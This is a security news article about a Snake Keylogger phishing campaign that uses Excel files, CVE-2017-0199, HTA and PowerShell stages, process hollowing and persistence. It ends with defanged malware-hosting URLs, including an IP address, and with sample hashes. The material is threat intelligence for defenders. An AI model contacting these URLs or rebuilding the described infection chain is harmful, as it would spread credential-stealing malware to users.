Snake Keylogger Targets Windows via Malicious Excel Files

Home/Internet Security, malicious cyber actors, Malware, Security Advisory, Security Update/Snake Keylogger Targets Windows via Malicious Excel Files

Snake Keylogger Targets Windows via Malicious Excel Files

Researchers have identified a sophisticated phishing campaign using a .NET-based Snake Keylogger variant. This attack uses weaponized Excel files to compromise Windows systems, posing serious risks to data security.

Snake Keylogger

Snake Keylogger, also known as “404 Keylogger” or “KrakenKeylogger,” is a .NET-based malware designed to steal sensitive data like credentials, clipboard content, and device info. It also logs keystrokes and captures screenshots, making it a powerful tool for cybercriminals.

Fortinet’s FortiGuard Labs revealed that the attack starts with a phishing email, luring recipients to open an attached Excel file titled “swift copy.xls.” The email falsely claims funds have been transferred to the recipient’s account. Despite a “[virus detected]” warning in the subject line from FortiGuard, some users may still be deceived.

The Malicious Excel Document

When the Excel file is opened, hidden malicious code runs in the background. It exploits the CVE-2017-0199 vulnerability using an embedded link to download more malware. This process occurs covertly, with Excel silently accessing a URL that triggers further downloads.

The attack proceeds by downloading an HTA file, which is run by the Windows application host (mshta.exe). This file contains obfuscated JavaScript that, when decoded, reveals VBScript and PowerShell scripts. These scripts then download and execute the Snake Keylogger’s loader module, a key part of the attack.

The Loader Module

The Loader module, built with the .NET Framework, uses multi-layered protection techniques like transformation and encryption to evade detection. It decrypts and extracts components needed to deploy the core Snake Keylogger module.

Deploy Module and Persistence

The Deploy module, extracted from the Loader, ensures Snake Keylogger’s persistence by renaming and hiding the Loader file, creating a startup task, and using process hollowing to inject malicious code into a new process.

The Snake Keylogger attack underscores the need for strong cybersecurity as cybercriminals evolve their tactics.

Users and organizations should use up-to-date antivirus software, be cautious with email attachments, and prioritize awareness and education to protect sensitive data.

The .NET-based Snake Keylogger attack via Excel documents poses a serious threat to Windows users. Understanding the attack and using proactive security measures can help individuals and organizations stay protected.

IOCs

URLs

hxxp://urlty[.]co/byPCO
hxxp[:]//192.3.176[.]138/xampp/zoom/107.hta
hxxp[:]//192.3.176[.]138/107/sahost.exe

Relevant Sample SHA-256

[swift copy.xls]
8406A1D7A33B3549DD44F551E5A68392F85B5EF9CF8F9F3DB68BD7E02D1EABA7

[107.hta]
6F6A660CE89F6EA5BBE532921DDC4AA17BCD3F2524AA2461D4BE265C9E7328B9

[The Loader module/sahost.exe / WeENKtk.exe / utGw.exe]
484E5A871AD69D6B214A31A3B7F8CFCED71BA7A07E62205A90515F350CC0F723

[Snake Keylogger core module / lfwhUWZlmFnGhDYPudAJ.exe]
207DD751868995754F8C1223C08F28633B47629F78FAAF70A3B931459EE60714

‍Follow Us on: Twitter, InstagramFacebook to get the latest security news!

By | 2024-09-03T23:05:58+05:30 September 3rd, 2024|Internet Security, malicious cyber actors, Malware, Security Advisory, Security Update|

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!